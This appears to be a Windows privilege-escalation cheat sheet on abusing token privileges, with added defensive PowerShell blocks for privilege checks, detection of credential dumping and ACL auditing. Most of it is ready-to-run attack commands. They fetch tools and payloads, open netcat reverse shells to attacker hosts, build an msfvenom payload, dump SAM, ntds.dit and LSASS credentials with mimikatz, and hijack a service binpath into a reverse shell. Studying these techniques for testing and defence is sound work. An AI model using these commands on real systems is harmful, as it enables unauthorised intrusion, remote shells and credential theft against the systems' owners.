Windows User Privileges


Last updated 22 hours ago

SeImpersonate

One of the following privileges in the current token is required for the attacks below:

  • SeAssignPrimaryToken: Allows a process to assign the primary token for a process. This privilege is critical for creating processes with specific user security contexts.

  • SeCreateToken: The SeCreateToken privilege allows a process to create new security tokens, typically used for authentication and identity representation.

  • SeImpersonatePrivilege: The SeImpersonatePrivilege allows a process to impersonate other users' security tokens. This privilege is crucial for services that act on behalf of authenticated clients, which is why service accounts such as IIS application pool identities typically hold it.
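The first thing to check, on either side of an engagement, is which of the privileges discussed on this page the current token actually holds. The following is an added example and not code from the original notes: it parses the output of `whoami /priv` and reports the sensitive privileges together with their Enabled/Disabled state. The sample rows at the bottom are constructed, not real output, so the parser can be exercised anywhere.

```powershell
# Added example, not part of the original notes. Parses "whoami /priv" and reports which
# of the token privileges discussed on this page are present and whether they are enabled.
$SensitivePrivileges = @(
    'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeCreateTokenPrivilege',
    'SeBackupPrivilege', 'SeRestorePrivilege', 'SeDebugPrivilege',
    'SeTakeOwnershipPrivilege', 'SeLoadDriverPrivilege'
)

function Get-SensitivePrivilege {
    [CmdletBinding()]
    param(
        # Lines of "whoami /priv" output; defaults to querying the current token.
        [string[]]$WhoamiOutput = (whoami /priv)
    )
    foreach ($line in $WhoamiOutput) {
        # Data rows look like: "SeDebugPrivilege   Debug programs   Disabled"
        if ($line -match '^(Se\w+Privilege)\s+.+?\s+(Enabled|Disabled)\s*$') {
            $name = $Matches[1]
            if ($SensitivePrivileges -contains $name) {
                [pscustomobject]@{
                    Privilege = $name
                    State     = $Matches[2]
                }
            }
        }
    }
}

# Constructed sample rows (not real output) so the parser can be exercised without a Windows host:
$Sample = @(
    'SeShutdownPrivilege           Shut down the system                      Disabled',
    'SeImpersonatePrivilege        Impersonate a client after authentication Enabled',
    'SeBackupPrivilege             Back up files and directories             Disabled'
)
Get-SensitivePrivilege -WhoamiOutput $Sample | Format-Table -AutoSize
# On a real host: Get-SensitivePrivilege | Format-Table -AutoSize
```

Note that a privilege listed as Disabled is still held by the token; it only has to be enabled before use (see "Enable a Privilege" at the end of this page), so from a hardening point of view both states count.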

Incognito (Metasploit)

With a meterpreter shell, once we have confirmed that we have these privileges, we can load incognito:

load incognito

To list the tokens:

list_tokens -u

For impersonating a token:

impersonate_token "name"

To upgrade the privileges in the meterpreter shell we have to migrate to another PID, for example the one of explorer.exe:

pgrep explorer
migrate <pid>

PrintSpoofer (Only works on Windows 10 and Server 2019)

We have to upload the nc.exe and PrintSpoofer.exe files to the victim machine:

(New-Object System.Net.WebClient).DownloadFile("http://<ip>/nc.exe", "C:\Temp\nc.exe")

(New-Object System.Net.WebClient).DownloadFile("http://<ip>/PrintSpoofer64.exe", "C:\Temp\PrintSpoofer64.exe")

Open a Listener

nc -nvlp 4444

Execute the exploit:

.\PrintSpoofer64.exe -c "C:\Temp\nc.exe 10.10.14.9 4444 -e cmd"

Juicy Potato

We have to copy the .exe file to the machine:

(New-Object System.Net.WebClient).DownloadFile("http://<ip>/JuicyPotato.exe", "C:\Temp\JuicyPotato.exe")

Powershell

We will upload a payload for our reverse shell. For this, we create a shell.bat file:

echo "powershell.exe -c iex(new-object net.webclient).downloadstring('http://<ip>:80/Invoke-PowerShellTcp.ps1')" > shell.bat

Finally upload the file to the machine:

(New-Object System.Net.WebClient).DownloadFile("http://<ip>/shell.bat", "C:\Temp\shell.bat")

CMD

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=5555 -a x64 --platform Windows -f exe -o shell.exe

The CLSID passed with -c has to be chosen depending on the OS version of the target system.

We have to start a listener (on the same port as our nishang shell):

nc -nlvp <port>

And finally execute the exploit:

Powershell

./JuicyPotato.exe -l <port> -p C:\temp\shell.bat -t * -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"

CMD

.\JuicyPotato.exe -l 443 -t * -p C:\Temp\shell.exe -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"
c:\tools\JuicyPotato.exe -l 12345 -p C:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe <ip> <port> -e cmd.exe" -t *

SeBackup and SeRestore Privilege

This privilege allows a user to read any file on the system, even those they would not normally have access to, by accessing files in "backup mode."

You can potentially exploit this by creating copies of sensitive files (like the SAM database, registry hives, or password-protected files) and then extracting credentials offline. For instance:

reg save HKLM\SECURITY security.hive
reg save HKLM\sam sam.hive
reg save HKLM\system system.hive

Dumping Hashes

impacket-secretsdump -sam sam.hive -system system.hive LOCAL

SeBackupPrivilege Privilege Escalation (diskshadow)

Script for PowerShell Environment

In our Kali machine, create file.dsh, the script that diskshadow will run:

SET CONTEXT PERSISTENT NOWRITERS
add volume c: alias foobar
create
expose %foobar% z:

Then use unix2dos to convert the line endings of the .dsh file to the CRLF format that the Windows machine expects:

unix2dos file.dsh

And upload the file to the machine

Transferring and Executing the DSH File

Once it is uploaded, run the file:

diskshadow /s file.dsh

Now we can use robocopy in backup mode (/b) to copy the file from the Z drive to the current directory:

robocopy /b z:\windows\ntds . ntds.dit

Another method:

Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ntds.dit

Export the SYSTEM registry hive:

reg save HKLM\SYSTEM c:\temp\system

Finally, send the system and ntds.dit files to our Kali machine.

Extract the Hashes

impacket-secretsdump -sam sam -system system -ntds ntds.dit LOCAL

SeDebugPrivilege

We can use ProcDump from the SysInternals suite to leverage this privilege and dump process memory.

procdump.exe -accepteula -ma lsass.exe lsass.dmp

If this succeeds, we can load the dump in Mimikatz using the sekurlsa::minidump command:

mimikatz.exe
mimikatz # log
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords
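The hive, NTDS and LSASS dumping commands in the SeBackup and SeDebug sections above all leave a process-creation trail, which is how a blue team spots them. The following is an added example, not code from the original notes: it matches process command lines against signatures derived only from the commands shown on this page. It reads Security event 4688 when command-line auditing ("Include command line in process creation events") is enabled; Sysmon event 1 command lines can be passed in through -CommandLine instead. The sample command lines at the bottom are constructed, not real log data.

```powershell
# Added example, not part of the original notes. Flags process command lines that match the
# hive, NTDS and LSASS dumping commands shown above.
$DumpSignatures = @(
    @{ Name = 'reg save of SAM/SYSTEM/SECURITY hive'; Pattern = '\breg(\.exe)?\s+save\s+HKLM\\(SAM|SYSTEM|SECURITY)\b' },
    @{ Name = 'diskshadow script execution';          Pattern = '\bdiskshadow(\.exe)?\s+/s\b' },
    @{ Name = 'backup-mode copy of ntds.dit';         Pattern = '\b(robocopy.*\s/b\s|Copy-FileSebackupPrivilege).*ntds\.dit' },
    @{ Name = 'LSASS memory dump with procdump';      Pattern = '\bprocdump.*\s-ma\s+lsass' }
)

function Get-ProcessCreationCommandLine {
    # Event 4688 stores the command line in property index 8 (empty unless auditing is enabled).
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -ErrorAction SilentlyContinue |
        ForEach-Object { if ($_.Properties.Count -gt 8) { $_.Properties[8].Value } } |
        Where-Object { -not [string]::IsNullOrWhiteSpace($_) }
}

function Find-CredentialDumpCommand {
    [CmdletBinding()]
    param([string[]]$CommandLine = (Get-ProcessCreationCommandLine))
    foreach ($cmd in $CommandLine) {
        foreach ($sig in $DumpSignatures) {
            if ($cmd -imatch $sig.Pattern) {
                [pscustomobject]@{ Signature = $sig.Name; CommandLine = $cmd }
            }
        }
    }
}

# Constructed sample command lines (not real log data); lines 1, 3 and 4 should be flagged.
$Sample = @(
    'reg  save HKLM\sam sam.hive',
    'C:\Windows\system32\svchost.exe -k netsvcs',
    'diskshadow /s file.dsh',
    'procdump.exe -accepteula -ma lsass.exe lsass.dmp'
)
Find-CredentialDumpCommand -CommandLine $Sample | Format-Table -AutoSize
# On a host with command-line auditing: Find-CredentialDumpCommand | Format-Table -AutoSize
```

The signatures are deliberately narrow (they mirror the exact invocations above), so renamed binaries or other tooling will not match; they are a starting point for a hunt, not a complete detection.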

RCE

We can also leverage SeDebugPrivilege for RCE.

Run the command tasklist and select the PID of a SYSTEM process (for example winlogon.exe):

.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,"")

SeTakeOwnership

Find an interesting file and change its ownership so that we can read its content. We can use the Windows binary takeown to take ownership of the file:

takeown /f '<file_path>'

To confirm the ownership we can run this command in PowerShell:

Get-ChildItem -Path '<file_path>' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}

We may still not be able to read the file and need to modify the file ACL using icacls to be able to read it.

icacls '<file_path>' /grant <user>:F

Files of Interest

c:\inetpub\wwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
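The same list is useful the other way round: after an incident, or as a periodic check, an administrator wants to know whether any of these files has changed owner or become readable by broad groups, which is exactly what the takeown/icacls sequence above produces. The following is an added example and not code from the original notes; it uses Get-Acl on the paths listed above and reports the owner plus any Allow entry that gives Everyone, Users or Authenticated Users read access. The list of "broad" principals is an assumption for this example.

```powershell
# Added example, not part of the original notes. Checks who owns each "file of interest"
# listed above and whether broad groups can read it.
$FilesOfInterest = @(
    'C:\inetpub\wwwroot\web.config',
    "$env:WINDIR\repair\sam", "$env:WINDIR\repair\system",
    "$env:WINDIR\repair\software", "$env:WINDIR\repair\security",
    "$env:WINDIR\system32\config\SecEvent.Evt",
    "$env:WINDIR\system32\config\default.sav", "$env:WINDIR\system32\config\security.sav",
    "$env:WINDIR\system32\config\software.sav", "$env:WINDIR\system32\config\system.sav"
)
# Principals that should never have read access to these files (assumed list for this example).
$BroadPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')

function Test-SensitiveFileAcl {
    [CmdletBinding()]
    param([string[]]$Path = $FilesOfInterest)
    $readData = [System.Security.AccessControl.FileSystemRights]::ReadData
    foreach ($p in $Path) {
        # Most repair/.sav files only exist on older builds; skip what is not there.
        if (-not (Test-Path -LiteralPath $p)) { continue }
        try { $acl = Get-Acl -LiteralPath $p } catch { Write-Warning "Cannot read ACL of $p : $_"; continue }
        $broadRead = @($acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $BroadPrincipals -contains $_.IdentityReference.Value -and
            $_.FileSystemRights.HasFlag($readData)
        })
        [pscustomobject]@{
            Path          = $p
            Owner         = $acl.Owner
            BroadReadable = ($broadRead.Count -gt 0)
            GrantedTo     = ($broadRead | ForEach-Object { $_.IdentityReference.Value }) -join ', '
        }
    }
}

Test-SensitiveFileAcl | Format-Table -AutoSize
```

An Owner other than BUILTIN\Administrators or NT SERVICE\TrustedInstaller on these paths, or a BroadReadable of True, is worth a closer look: a user who owns a file can rewrite its ACL at will, which is the whole point of the SeTakeOwnership technique.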

SeLoadDriverPrivilege

sc.exe query
$services=(get-service).name | foreach {(Get-ServiceAcl $_)  | where {$_.access.IdentityReference -match 'Server Operators'}}
sc.exe config VSS binpath="C:\temp\nc64.exe -e cmd <LHOST> <LPORT>"
sc.exe stop VSS
sc.exe start VSS

Enable a Privilege

Windows does not provide a built-in command or PowerShell cmdlet to enable privileges, so we need some scripting to help us out, for example the PoC script (a PowerShell script to enable all privileges). First, transfer it over to the target system.
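To show what such a script does under the hood, here is an added example that is not the script the original notes link to. It enables one named privilege in the current process token through the AdjustTokenPrivileges API via P/Invoke. It can only switch a privilege from Disabled to Enabled; a privilege the token does not hold at all cannot be granted this way, and the function returns false in that case (ERROR_NOT_ALL_ASSIGNED). The choice of SeBackupPrivilege at the bottom is a hypothetical example value.

```powershell
# Added example, not the script the original notes link to. Enables a privilege that the
# current token already holds but shows as "Disabled" in whoami /priv.
$Source = @'
using System;
using System.Runtime.InteropServices;
public static class TokenPriv
{
    // Pack = 1 reproduces the native layout: DWORD count, then LUID (8 bytes) + DWORD attributes.
    [StructLayout(LayoutKind.Sequential, Pack = 1)]
    struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public long Luid; public uint Attributes; }

    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool OpenProcessToken(IntPtr process, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern bool LookupPrivilegeValue(string system, string name, out long luid);
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll, ref TOKEN_PRIVILEGES state,
                                             uint bufferLength, IntPtr previous, IntPtr returnLength);
    [DllImport("kernel32.dll")] static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll")] static extern bool CloseHandle(IntPtr handle);

    const uint TOKEN_ADJUST_PRIVILEGES = 0x20, TOKEN_QUERY = 0x8, SE_PRIVILEGE_ENABLED = 0x2;
    const int ERROR_NOT_ALL_ASSIGNED = 1300;

    // Returns true when the privilege is now enabled; false if it is not held or the call failed.
    public static bool Enable(string privilege)
    {
        IntPtr token;
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out token)) return false;
        try
        {
            TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES();
            tp.PrivilegeCount = 1;
            tp.Attributes = SE_PRIVILEGE_ENABLED;
            if (!LookupPrivilegeValue(null, privilege, out tp.Luid)) return false;
            if (!AdjustTokenPrivileges(token, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero)) return false;
            // AdjustTokenPrivileges returns true even when nothing changed; 1300 means "not held".
            return Marshal.GetLastWin32Error() != ERROR_NOT_ALL_ASSIGNED;
        }
        finally { CloseHandle(token); }
    }
}
'@
Add-Type -TypeDefinition $Source

# Enable one privilege for this process and show the before/after state from whoami /priv.
$name = 'SeBackupPrivilege'   # hypothetical choice; use whichever privilege whoami /priv lists as Disabled
whoami /priv | Select-String $name
if ([TokenPriv]::Enable($name)) { "$name enabled" } else { "$name is not held by this token or could not be enabled" }
whoami /priv | Select-String $name
```

The state change applies to this process and to children it spawns (which is why the second whoami /priv reflects it), not to the account's other sessions; the "enable all" scripts simply loop this call over every privilege the token lists.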